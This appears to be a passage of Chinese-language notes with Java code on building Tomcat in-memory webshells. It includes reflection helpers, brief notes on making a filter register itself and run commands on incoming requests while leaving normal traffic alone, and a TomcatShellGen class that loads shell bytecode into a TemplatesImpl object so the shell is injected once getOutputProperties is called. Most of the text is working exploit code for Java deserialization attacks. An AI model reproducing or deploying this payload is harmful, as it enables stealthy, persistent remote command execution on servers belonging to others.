public static <T> T createWithConstructor(Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs) throws Exception { Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes); objCons.setAccessible(true); Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); sc.setAccessible(true); return (T) sc.newInstance(consArgs); }
public static Field getField(final Class<?> clazz, final String fieldName) { Field field = null; try { field = clazz.getDeclaredField(fieldName); field.setAccessible(true); } catch (NoSuchFieldException ex) { if (clazz.getSuperclass() != null) field = getField(clazz.getSuperclass(), fieldName); } return field; }
public static Object getFieldValue(Object obj,String fieldname) throws Exception{ Field field = getField(obj.getClass(), fieldname); Object o = field.get(obj); return o; }
filter
无参构造处注册自己,注意setFilter传this。
在处理请求的地方执行命令并回显结果,注意别影响正常业务逻辑
然后剩下的其他重写的方法都不用写。
listener
servlet
封装
马写好后,把字节码传给TemplatesImpl。
最后得到的TemplatesImpl只要一调用getOutputProperties就立刻注入马。
public class TomcatShellGen {
public static TemplatesImpl servletShell() throws Exception{ return doGen("ServletShell.class"); } public static TemplatesImpl listenerShell() throws Exception{ return doGen("ListenerShell.class"); } public static TemplatesImpl filterShell() throws Exception{ return doGen("FilterShell.class"); } public static TemplatesImpl doGen(String shellClass) throws Exception{ InputStream resourceAsStream = TomcatShellGen.class.getResourceAsStream(shellClass); byte[] code = Util.inputStream2ByteArray(resourceAsStream); Class clazz = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); Field bytecodes = clazz.getDeclaredField("_bytecodes"); bytecodes.setAccessible(true); TemplatesImpl o = new TemplatesImpl(); byte[][] b = new byte[][]{code}; bytecodes.set(o, b); Field _name = clazz.getDeclaredField("_name"); _name.setAccessible(true); _name.set(o, "Hello"); Field _tfactory = clazz.getDeclaredField("_tfactory"); _tfactory.setAccessible(true); _tfactory.set(o, new TransformerFactoryImpl()); Field _transletIndex = clazz.getDeclaredField("_transletIndex"); _transletIndex.setAccessible(true); _transletIndex.set(o, 0); return o; } }